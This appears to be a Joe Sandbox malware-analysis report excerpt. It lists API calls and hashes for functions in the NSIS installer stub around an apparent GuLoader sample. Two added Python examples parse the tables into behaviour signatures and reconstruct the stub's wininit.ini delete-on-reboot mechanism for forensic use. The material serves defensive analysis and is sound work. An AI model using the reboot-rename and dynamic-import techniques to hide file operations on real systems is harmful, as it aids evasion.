                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                          • Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
                                                          • Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                          • Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00436800,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,00436800,?,75572EE0,004057F0,?,00436800,75572EE0), ref: 00406296
                                                          • FindClose.KERNEL32(00000000), ref: 004062A2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID: 8WB
                                                          • API String ID: 2295610775-3088156181
                                                          • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                          • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                                          • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                          • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                          • GetClientRect.USER32(?,?), ref: 004053DC
                                                          • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                          • ShowWindow.USER32(?,?), ref: 00405480
                                                          • GetDlgItem.USER32(?,?), ref: 004054A1
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                          • GetDlgItem.USER32(?,?), ref: 004053AE
                                                            • Part of subcall function 004041CF: SendMessageW.USER32(?,?,00000001,00403FFB), ref: 004041DD
                                                          • GetDlgItem.USER32(?,?), ref: 004054F3
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405508
                                                          • ShowWindow.USER32(00000000), ref: 0040552C
                                                          • ShowWindow.USER32(?,?), ref: 00405531
                                                          • ShowWindow.USER32(?), ref: 0040557B
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                          • CreatePopupMenu.USER32 ref: 004055C0
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                          • GetWindowRect.USER32(?,?), ref: 004055F4
                                                          • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 0040560D
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                          • OpenClipboard.USER32(00000000), ref: 00405655
                                                          • EmptyClipboard.USER32 ref: 0040565B
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                          • CloseClipboard.USER32 ref: 004056B6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: {$&B
                                                          • API String ID: 590372296-2518801558
                                                          • Opcode ID: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
                                                          • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                          • Opcode Fuzzy Hash: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
                                                          • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69
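The functions listed above belong to the NSIS installer stub that wraps this sample (the `NSIS Error`, `~nsu.tmp` and `SeShutdownPrivilege` strings are the stub's own), and several entries in the report's signature list (dynamic API resolution via GetModuleHandle/LoadLibrary plus GetProcAddress, shutdown/reboot via ExitWindowsEx, clipboard access) can be re-derived from nothing but these per-function API tables. The Python below is an added example and not part of the Joe Sandbox report or its IDA plugin: it parses lines in the report's `Name.MODULE(args), ref: address` shape (including the `Part of subcall function` and ordinal-import `#17` forms), groups them per function, decodes the ExitWindowsEx flags and reason code, and flags the same behaviours. The signature names and the constructed SAMPLE text (copied in the shape of entries from the tables above) are this example's own choices.

```python
"""Parse a Joe Sandbox per-function "APIs" listing and derive coarse
behavioural signatures from it. Added example; not Joe Sandbox code."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Constructed sample, copied in the shape of the report's entries above.
SAMPLE = """\
APIs
• #17.COMCTL32 ref: 00403379
• SetErrorMode.KERNEL32(00008001), ref: 00403384
  • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
  • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062CF
  • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
• SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403585
• SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040358D
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
• ExitProcess.KERNEL32 ref: 00403827
APIs
• OpenClipboard.USER32(00000000), ref: 00405655
• SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
• CloseClipboard.USER32 ref: 004056B6
APIs
• ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
"""


@dataclass
class Call:
    api: str                # "ExitWindowsEx", or an ordinal import such as "#17"
    module: str             # "USER32"
    args: list              # raw argument tokens exactly as the report renders them
    ref: str                # call-site address
    parent: Optional[str]   # subcall function address when the call is inherited


# Optional "Part of subcall function XXXXXXXX:", then Name.MODULE(args), ref: ADDR.
# The argument list is optional: ExitProcess is rendered without parentheses.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function ([0-9A-F]{8}):\s*)?"
    r"([#\w]+)\.([A-Z0-9]+)(?:\(([^)]*)\))?,?\s+ref:\s+([0-9A-F]{8})\s*$"
)


def parse_api_listing(text: str) -> list:
    """Each "APIs" header starts a new function; return a list of Call lists."""
    functions = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            functions.append([])
            continue
        m = LINE_RE.match(line)
        if not m or not functions:
            continue
        parent, api, module, args, ref = m.groups()
        functions[-1].append(Call(api, module, args.split(",") if args else [], ref, parent))
    return functions


# ExitWindowsEx flag bits and the reason-code fields seen in this sample.
EWX_FLAGS = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE",
             0x8: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}
MAJOR = {0x00040000: "MAJOR_APPLICATION"}
MINOR = {0x00000002: "MINOR_INSTALLATION"}


def decode_exit_windows(flags_hex: str, reason_hex: str) -> str:
    """Render the two ExitWindowsEx arguments as symbolic constants."""
    flags, reason = int(flags_hex, 16), int(reason_hex, 16)
    names = [n for bit, n in EWX_FLAGS.items() if flags & bit] or ["EWX_LOGOFF"]
    planned = "planned" if reason & 0x80000000 else "unplanned"   # SHTDN_REASON_FLAG_PLANNED
    major, minor = reason & 0x000F0000, reason & 0xFFFF
    return f"{'|'.join(names)} ({planned}, {MAJOR.get(major, hex(major))}|{MINOR.get(minor, hex(minor))})"


def classify(functions: list) -> dict:
    """Map a signature name to the call-site addresses that triggered it."""
    hits = defaultdict(list)
    loaders = {"GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW"}
    for calls in functions:
        apis = {c.api: c for c in calls}
        # Resolving imports by hand is what the report calls "dynamically determine API calls".
        if "GetProcAddress" in apis and apis.keys() & loaders:
            hits["dynamic API resolution"].append(apis["GetProcAddress"].ref)
        if "OpenClipboard" in apis and apis.keys() & {"GetClipboardData", "SetClipboardData"}:
            direction = "read" if "GetClipboardData" in apis else "write"
            hits[f"clipboard {direction}"].append(apis["OpenClipboard"].ref)
        for c in calls:
            if c.api == "ExitWindowsEx" and len(c.args) == 2:
                hits["shutdown/reboot"].append(f"{c.ref}: {decode_exit_windows(*c.args)}")
            if c.api == "SetEnvironmentVariableW" and c.args and c.args[0] in ("TEMP", "TMP"):
                hits["TEMP/TMP redirected"].append(f"{c.ref}: {c.args[0]}")
            if c.api == "ShellExecuteW" and "open" in c.args:
                hits["ShellExecute open"].append(c.ref)
    return dict(hits)


if __name__ == "__main__":
    for name, refs in classify(parse_api_listing(SAMPLE)).items():
        print(f"{name}: {', '.join(refs)}")
```

Run against the tables on this page the same rules fire on the NSIS stub's own housekeeping (reboot-on-request, TEMP redirection, dynamic import of optional shell functions), so a signature of this kind says what the installer framework can do, not what the GuLoader payload does; the payload's behaviour is in the separate process the report tracks, not in these functions.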
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                          • ShowWindow.USER32(?), ref: 00403D1B
                                                          • DestroyWindow.USER32 ref: 00403D2F
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                          • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                          • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                          • EnableWindow.USER32(?,?), ref: 00403F83
                                                          • EnableWindow.USER32(?,?), ref: 00403F9E
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                          • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                          • SendMessageW.USER32(?,?,00000000,00000001), ref: 00403FD3
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                          • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                          • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID: &B
                                                          • API String ID: 184305955-3208460036
                                                          • Opcode ID: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
                                                          • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                                          • Opcode Fuzzy Hash: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
                                                          • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E
                                                          APIs
                                                            • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
                                                            • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062CF
                                                            • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          • lstrcatW.KERNEL32(00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800,75573420,00000000,00434000), ref: 004039A0
                                                          • lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800), ref: 00403A20
                                                          • lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                          • GetFileAttributesW.KERNEL32(004271A0), ref: 00403A3E
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A87
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                          • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403ADC
                                                          • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                          • LoadLibraryW.KERNEL32(RichEd20), ref: 00403B58
                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                          • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                          • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                          • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                          • API String ID: 914957316-1918744475
                                                          • Opcode ID: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
                                                          • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                          • Opcode Fuzzy Hash: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
                                                          • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                          • GetDlgItem.USER32(?,?), ref: 004043E9
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
                                                          • GetSysColor.USER32(?), ref: 00404417
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                          • lstrlenW.KERNEL32(?), ref: 00404438
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                          • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                          • SendMessageW.USER32(00000000), ref: 004044BA
                                                          • GetDlgItem.USER32(?,?), ref: 004044E5
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                          • SetCursor.USER32(00000000), ref: 00404539
                                                          • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                          • SetCursor.USER32(00000000), ref: 0040455D
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
                                                          • SendMessageW.USER32(?,00000000,00000000), ref: 0040459E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                          • String ID: N$open
                                                          • API String ID: 3615053054-904208323
                                                          • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                          • Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
                                                          • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                          • Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99
                                                          APIs
                                                          • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                          • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                            • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                            • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                          • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                          • wsprintfA.USER32 ref: 00405CDE
                                                          • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,?,00426588,?,?,?,?,?), ref: 00405D19
                                                          • GlobalAlloc.KERNEL32(?,0000000A), ref: 00405D28
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                          • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                          • API String ID: 1265525490-899692902
                                                          • Opcode ID: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
                                                          • Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
                                                          • Opcode Fuzzy Hash: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
                                                          • Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
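The call sequence in the function above (lstrcpyW of "NUL", two GetShortPathNameW calls, wsprintfA with "%ls=%ls", GetFileSize, GlobalAlloc of size + 0xA, lstrcpyA of "[Rename]", SetFilePointer, WriteFile) is the shape of the NSIS stub's wininit.ini fallback for delete/rename-on-reboot: the operation is queued as a "new=old" line in the [Rename] section of wininit.ini, with "NUL" as the target meaning delete. NSIS only takes this path when MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT is unavailable or fails; on NT-based Windows the artifact a responder should expect instead is the PendingFileRenameOperations registry value. The following is an added example written for this page, not code from the report or from NSIS. It reconstructs the section-editing logic on the file text so it runs offline; the 8.3 short names are assumed values passed in through a callable, and CRLF line endings are assumed to match the "[Rename]\r\n" string the stub searches for.

```python
RENAME_SECTION = "[Rename]\r\n"   # 10 bytes: the +0xA in the GlobalAlloc call above


def rename_line(prev_name: str, new_name=None, shorten=lambda p: p) -> str:
    """Build the '%ls=%ls' line. new_name=None gives 'NUL=<old>', i.e. delete on
    reboot; `shorten` stands in for GetShortPathNameW (identity by default)."""
    target = "NUL" if new_name is None else shorten(new_name)
    return f"{target}={shorten(prev_name)}\r\n"


def add_rename_entry(ini_text: str, line: str) -> str:
    """Queue `line` in the [Rename] section, keeping the placement the stub uses:
    create the section at end of file if missing, otherwise put the line after
    the existing entries and before the next '[section]' header."""
    sec = ini_text.find(RENAME_SECTION)
    if sec < 0:
        return ini_text + RENAME_SECTION + line
    nxt = ini_text.find("\n[", sec + len(RENAME_SECTION))
    if nxt < 0:                       # [Rename] is the last section: append
        return ini_text + line
    pos = nxt + 1                     # start of the next section header
    return ini_text[:pos] + line + ini_text[pos:]


def pending_operations(ini_text: str):
    """Responder's view: (op, source, target) tuples the next boot would act on.
    Section-name matching is done case-insensitively here (this example's choice)."""
    ops, in_rename = [], False
    for raw in ini_text.splitlines():
        entry = raw.strip()
        if entry.startswith("["):
            in_rename = entry.lower() == "[rename]"
            continue
        if in_rename and "=" in entry:
            target, source = entry.split("=", 1)
            ops.append(("delete" if target.upper() == "NUL" else "rename", source, target))
    return ops


if __name__ == "__main__":
    # Constructed inputs; the 8.3 form is assumed, not queried from the OS.
    tmp = r"C:\Users\me\AppData\Local\Temp\nst1234.tmp"
    short_names = {tmp: r"C:\Users\me\AppData\Local\Temp\NST123~1.TMP"}
    ini = "[Other]\r\nk=v\r\n"
    ini = add_rename_entry(ini, rename_line(tmp, shorten=lambda p: short_names.get(p, p)))
    print(ini)
    print(pending_operations(ini))
```

Note that the stub matches the literal "[Rename]\r\n"; a file whose section header uses bare "\n" gets a second [Rename] section appended rather than extended, so a forensic parser should not assume a single section.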
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00428200,000000FF,00000010,?), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                          • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                          • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                          • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                          • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                          • lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 0040479C
                                                          • lstrcatW.KERNEL32(?,004271A0), ref: 004047A8
